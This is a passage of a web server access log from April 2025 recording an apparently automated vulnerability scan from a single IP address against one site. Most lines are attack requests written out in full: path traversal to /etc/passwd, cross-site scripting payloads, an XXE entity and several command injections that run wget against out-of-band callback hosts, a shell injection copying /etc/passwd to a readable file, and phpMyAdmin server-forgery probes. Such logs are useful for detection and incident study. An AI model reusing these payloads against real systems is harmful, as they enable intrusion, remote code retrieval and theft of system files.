-0400] "GET /assets/file:%2f%2f/etc/passwd HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.9.17" 154.84.62.234 - - [24/Apr/2025:03:19:05 -0400] "POST /webtools/control/xmlrpc HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:03:19:56 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:03:21:43 -0400] "POST /wp-admin/options-general.php?page=smartcode HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0" 154.84.62.234 - - [24/Apr/2025:03:21:48 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Kubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:03:22:42 -0400] "GET /solr/admin/cores?wt=json HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.124 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:03:23:30 -0400] "GET /?echo+luSNeuRzEl HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0" 154.84.62.234 - - [24/Apr/2025:03:24:46 -0400] "GET /login HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:03:25:42 -0400] "POST /ws_utc/resources/setting/options HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.2.17" 154.84.62.234 - - [24/Apr/2025:03:25:46 -0400] "POST /ws_utc/resources/setting/keystore HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Kubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:03:26:53 -0400] "POST /CMSPages/Staging/SyncServer.asmx/ProcessSynchronizationTaskData HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.2 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:03:26:56 -0400] "GET /cs/Satellite?pagename=OpenMarket/Gator/FlexibleAssets/AssetMaker/complexassetmaker&cs_imagedir=qqq\"><script>alert(document.domain)</script> HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0" 154.84.62.234 - - [24/Apr/2025:03:27:01 -0400] "GET /cs/Satellite?pagename=OpenMarket%2FXcelerate%2FActions%2FSecurity%2FNoXceleditor&WemUI=qqq%27;}%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (CentOS; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0" 154.84.62.234 - - [24/Apr/2025:03:27:08 -0400] "GET /cs/Satellite?pagename=OpenMarket%2FXcelerate%2FActions%2FSecurity%2FProcessLoginRequest&WemUI=qqq%27;}%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3 Safari/605.5.16" 154.84.62.234 - - [24/Apr/2025:03:27:29 -0400] "POST /timesheet/login.php HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11_2_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:03:28:01 -0400] "GET /solr/admin/cores?wt=json HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36" 154.84.62.234 - admin [24/Apr/2025:03:28:53 -0400] "POST /checkValid HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:03:33:55 -0400] "GET /wan.htm HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.182 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:03:34:29 -0400] "POST /NateMail.php HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko/20100101 Firefox/24.0" 154.84.62.234 - - [24/Apr/2025:03:35:21 -0400] "GET /whoAmI/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64; rv:125.0) Gecko/20100101 Firefox/125.0" 154.84.62.234 - - [24/Apr/2025:03:35:26 -0400] "GET /whoAmI/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:03:37:26 -0400] "POST /wp-admin/options-general.php?page=yuzo-related-post HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.3" 154.84.62.234 - - [24/Apr/2025:03:37:33 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.9.21" 154.84.62.234 - - [24/Apr/2025:03:37:42 -0400] "POST /share/page/dologin HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:03:37:45 -0400] "POST /config/pw_snmp_done.html HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Kubuntu; Linux i686; rv:124.0) Gecko/20100101 Firefox/124.0" 154.84.62.234 - - [24/Apr/2025:03:37:50 -0400] "GET /config/pw_snmp.html HTTP/1.1" 200 0 "-" "Mozilla/5.0 (SS; Linux x86_64; rv:125.0) Gecko/20100101 Firefox/125.0" 154.84.62.234 - - [24/Apr/2025:03:37:56 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0" 154.84.62.234 - - [24/Apr/2025:03:38:07 -0400] "GET /login HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Kubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:03:38:14 -0400] "POST /Collector/diagnostics/ping HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:03:38:22 -0400] "GET /login HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:123.0) Gecko/20100101 Firefox/123.0" 154.84.62.234 - - [24/Apr/2025:03:38:27 -0400] "POST /Collector/diagnostics/trace_route HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux x86_64; rv:126.0) Gecko/20100101 Firefox/126.0" 154.84.62.234 - - [24/Apr/2025:03:38:29 -0400] "POST /crowd/admin/uploadplugin.action HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:03:38:33 -0400] "GET /crowd/plugins/servlet/exp HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 12_0) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:03:41:03 -0400] "GET /login HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux x86_64; rv:127.0) Gecko/20100101 Firefox/127.0" 154.84.62.234 - - [24/Apr/2025:03:42:56 -0400] "POST /password_change.cgi HTTP/1.1" 403 1242 "https://mgrokokbet.id" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:03:44:05 -0400] "POST /rpc.cgi HTTP/1.1" 200 0 "https://mgrokokbet.id/sysinfo.cgi?xnavigation=1" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:03:44:05 -0400] "POST /rpc.cgi HTTP/1.1" 200 0 "https://mgrokokbet.id/sysinfo.cgi?xnavigation=1" "Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:03:44:05 -0400] "POST /session_login.cgi HTTP/1.1" 200 0 "https://mgrokokbet.id" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0.1 Mobile/15E148 Safari/604.1" 154.84.62.234 - - [24/Apr/2025:03:44:05 -0400] "POST /session_login.cgi HTTP/1.1" 200 0 "https://mgrokokbet.id" "Mozilla/5.0 (Knoppix; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:03:44:06 -0400] "GET /wp-content/plugins/my-calendar/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.1.1" 154.84.62.234 - - [24/Apr/2025:03:49:07 -0400] "GET /wp-content/plugins/download-manager/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:03:49:23 -0400] "POST /api/users HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:03:49:38 -0400] "GET /login HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.32 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:03:49:43 -0400] "POST /Collector/appliancesettings/applianceSettingsFileTransfer HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:03:49:46 -0400] "GET /talari/app/files/2w9rfeW1tco1oeRmskBpFusDWdI HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux i686; rv:128.0) Gecko/20100101 Firefox/128.0" 154.84.62.234 - - [24/Apr/2025:03:50:36 -0400] "POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0) Gecko/20100101 Firefox/124.0" 154.84.62.234 - - [24/Apr/2025:03:51:13 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (SS; Linux i686; rv:127.0) Gecko/20100101 Firefox/127.0" 154.84.62.234 - - [24/Apr/2025:03:51:15 -0400] "GET /wp-content/plugins/checklist/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0" 154.84.62.234 - - [24/Apr/2025:03:53:57 -0400] "POST /wp-json/visualizer/v1/update-chart HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2.1 Safari/605.7.15" 154.84.62.234 - - [24/Apr/2025:03:54:03 -0400] "POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.54" 154.84.62.234 - - [24/Apr/2025:03:55:19 -0400] "POST /admin/?n=language&c=language_general&a=doExportPack HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (SS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:03:55:20 -0400] "GET /wp-content/plugins/visualizer/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:03:58:25 -0400] "POST /getcfg.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:03:58:26 -0400] "POST /ui/api/v1/ui/auth/login HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:03:59:07 -0400] "GET /jnoj/web/polygon/problem/viewfile?id=1&name=../../../../../../../etc/passwd HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Kubuntu; Linux i686; rv:125.0) Gecko/20100101 Firefox/125.0" 154.84.62.234 - - [24/Apr/2025:03:59:14 -0400] "GET /zabbix.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3 Safari/605.5.16" 154.84.62.234 - - [24/Apr/2025:03:59:14 -0400] "GET /zabbix/zabbix.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:03:59:14 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:04:00:38 -0400] "POST /admin/auth/reset-password HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36" 154.84.62.234 - admin [24/Apr/2025:04:00:47 -0400] "POST /boafrm/formSysCmd HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux x86_64; rv:127.0) Gecko/20100101 Firefox/127.0" 154.84.62.234 - - [24/Apr/2025:04:06:13 -0400] "GET /solr/admin/cores?wt=json HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux i686; rv:123.0) Gecko/20100101 Firefox/123.0" 154.84.62.234 - - [24/Apr/2025:04:08:02 -0400] "POST /xmlpserver/ReportTemplateService.xls HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.22" 154.84.62.234 - - [24/Apr/2025:04:10:50 -0400] "POST /dashboard/uploadID.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:04:10:55 -0400] "GET /xmlpserver/convert?xml=<%3fxml+version%3d\"1.0\"+%3f><!DOCTYPE+r+[<!ELEMENT+r+ANY+><!ENTITY+%25+sp+SYSTEM+\"http%3a//d04qr7ij4pq19d75k490d54xw3nf6pxux.oast.online/xxe.xml\">%25sp%3b%25param1%3b]>&_xf=Excel&_xl=123&template=123 HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:04:11:23 -0400] "GET /?pum_action=tools_page_tab_system_info HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux x86_64; rv:126.0) Gecko/20100101 Firefox/126.0" 154.84.62.234 - - [24/Apr/2025:04:11:25 -0400] "POST / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:04:12:37 -0400] "POST /servlet/UploadServlet HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:04:12:42 -0400] "GET /test.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:04:13:06 -0400] "GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/WebReferences HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:04:13:41 -0400] "POST /rest/tinymce/1/macro/preview HTTP/1.1" 200 0 "mgrokokbet.id" "Mozilla/5.0 (Kubuntu; Linux x86_64; rv:120.0) Gecko/20100101 Firefox/120.0" 154.84.62.234 - - [24/Apr/2025:04:15:44 -0400] "GET /Collector/storagemgmt/apply?data%5B0%5D%5Bhost%5D=%60/bin/wget+http://d04qr7ij4pq19d75k490zrcg6c6yryf4b.oast.online%60&data%5B0%5D%5Bpath%5D=mypath&data%5B0%5D%5Btype%5D=mytype HTTP/1.1" 200 0 "-" "-" 154.84.62.234 - - [24/Apr/2025:04:15:44 -0400] "POST /apply_sec.cgi HTTP/1.1" 200 0 "https://mgrokokbet.id" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:04:15:46 -0400] "POST /apply_sec.cgi HTTP/1.1" 403 1242 "https://mgrokokbet.id/login_pic.asp" "Mozilla/5.0 (Fedora; Linux i686; rv:125.0) Gecko/20100101 Firefox/125.0" 154.84.62.234 - - [24/Apr/2025:04:15:48 -0400] "POST /apply_sec.cgi HTTP/1.1" 200 0 "https://mgrokokbet.id/login_pic.asp" "Mozilla/5.0 (X11; Linux i686; rv:127.0) Gecko/20100101 Firefox/127.0" 154.84.62.234 - - [24/Apr/2025:04:16:00 -0400] "POST /cgi-bin/file_transfer.cgi HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Safari/605.4.16" 154.84.62.234 - - [24/Apr/2025:04:16:23 -0400] "POST /node/1?_format=hal_json HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0" 154.84.62.234 - - [24/Apr/2025:04:16:34 -0400] "PUT /wp-content/plugins/w3-total-cache/pub/sns.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0" 154.84.62.234 - - [24/Apr/2025:04:17:06 -0400] "GET /Collector/nms/addModifyZTDProxy?ztd_server=127.0.0.1&ztd_port=3333&ztd_username=user&ztd_password=$(/bin/wget$IFShttp://d04qr7ij4pq19d75k4906hgtc8s4ttcht.oast.online) HTTP/1.1" 200 0 "-" "-" 154.84.62.234 - - [24/Apr/2025:04:17:27 -0400] "POST /pandora_console/index.php?login=1 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:04:17:27 -0400] "GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/WebReferences HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:04:17:30 -0400] "GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/Slots HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0.1 Mobile/15E148 Safari/604.1" 154.84.62.234 - - [24/Apr/2025:04:17:30 -0400] "POST /pandora_console/index.php?sec=netf&sec2=operation/netflow/nf_live_view&pure=0 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Edge/16.16299" 154.84.62.234 - - [24/Apr/2025:04:18:06 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18363" 154.84.62.234 - - [24/Apr/2025:04:18:24 -0400] "GET /pma/index.php?pma_servername=d04qr7ij4pq19d75k490aoe3g5agay86h.oast.online&pma_username=2w9rfaQkejHgasPa9t3bKAY2mAM&pma_password=2w9rfaQkejHgasPa9t3bKAY2mAM&server=1 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:04:18:24 -0400] "GET /pmd/index.php?pma_servername=d04qr7ij4pq19d75k490niiwtzwcwoakt.oast.online&pma_username=2w9rfaQkejHgasPa9t3bKAY2mAM&pma_password=2w9rfaQkejHgasPa9t3bKAY2mAM&server=1 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.1\x0920.51" 154.84.62.234 - - [24/Apr/2025:04:18:24 -0400] "GET /index.php?pma_servername=d04qr7ij4pq19d75k4904eyfs15dzsqrp.oast.online&pma_username=2w9rfaQkejHgasPa9t3bKAY2mAM&pma_password=2w9rfaQkejHgasPa9t3bKAY2mAM&server=1 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (SS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:04:18:24 -0400] "GET /_phpmyadmin/index.php?pma_servername=d04qr7ij4pq19d75k490x1h5z3f579rbh.oast.online&pma_username=2w9rfaQkejHgasPa9t3bKAY2mAM&pma_password=2w9rfaQkejHgasPa9t3bKAY2mAM&server=1 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:123.0) Gecko/20100101 Firefox/123.0" 154.84.62.234 - - [24/Apr/2025:04:18:24 -0400] "GET /phpmyadmin/index.php?pma_servername=d04qr7ij4pq19d75k490i43j7izmgk3zn.oast.online&pma_username=2w9rfaQkejHgasPa9t3bKAY2mAM&pma_password=2w9rfaQkejHgasPa9t3bKAY2mAM&server=1 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:04:18:24 -0400] "GET /phpMyAdmin/index.php?pma_servername=d04qr7ij4pq19d75k4901usho8ip64xiu.oast.online&pma_username=2w9rfaQkejHgasPa9t3bKAY2mAM&pma_password=2w9rfaQkejHgasPa9t3bKAY2mAM&server=1 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Kubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36" 34.226.89.140 - - [24/Apr/2025:04:19:32 -0400] "GET /info.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:04:20:23 -0400] "POST /service/extdirect HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux i686; rv:124.0) Gecko/20100101 Firefox/124.0" 154.84.62.234 - - [24/Apr/2025:04:21:18 -0400] "POST /photo/p/api/album.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Kubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:04:21:26 -0400] "POST /wls-wsat/CoordinatorPortType HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux i686; rv:124.0) Gecko/20100101 Firefox/124.0" 154.84.62.234 - - [24/Apr/2025:04:21:29 -0400] "POST /wls-wsat/CoordinatorPortType HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.5.23" 154.84.62.234 - - [24/Apr/2025:04:23:07 -0400] "POST /cgi-bin/supportInstaller HTTP/1.1" 403 1242 "-" "MSIE" 154.84.62.234 - - [24/Apr/2025:04:23:21 -0400] "POST /adxmlrpc.php HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Knoppix; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:04:23:25 -0400] "GET /plugins/3rdPartyServers/ox3rdPartyServers/max.class.php?0=id HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11) AppleWebKit/616.17 (KHTML, like Gecko) Version/17.3.75 Safari/616.17" 154.84.62.234 - - [24/Apr/2025:04:25:10 -0400] "POST /api/timelion/run HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14) AppleWebKit/616.19.3 (KHTML, like Gecko) Version/17.6.11 Safari/616.19.3" 154.84.62.234 - - [24/Apr/2025:04:27:28 -0400] "POST /wls-wsat/CoordinatorPortType HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.4.22" 154.84.62.234 - - [24/Apr/2025:04:27:31 -0400] "POST /_async/AsyncResponseService HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:04:27:34 -0400] "GET /_async/favicon.ico HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:04:31:24 -0400] "GET /card_scan.php?No=30&ReaderNo=%60cat%20/etc/passwd%20%3E%20HXIRgOCoHP.txt%60 HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393" 154.84.62.234 - - [24/Apr/2025:04:31:28 -0400] "GET /HXIRgOCoHP.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 17_4_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:04:33:06 -0400] "POST /rest/issueNav/1/issueTable HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.6.17" 154.84.62.234 - - [24/Apr/2025:04:34:14 -0400] "POST /plugins/servlet/gadgets/makeRequest HTTP/1.1" 200 0 "-" 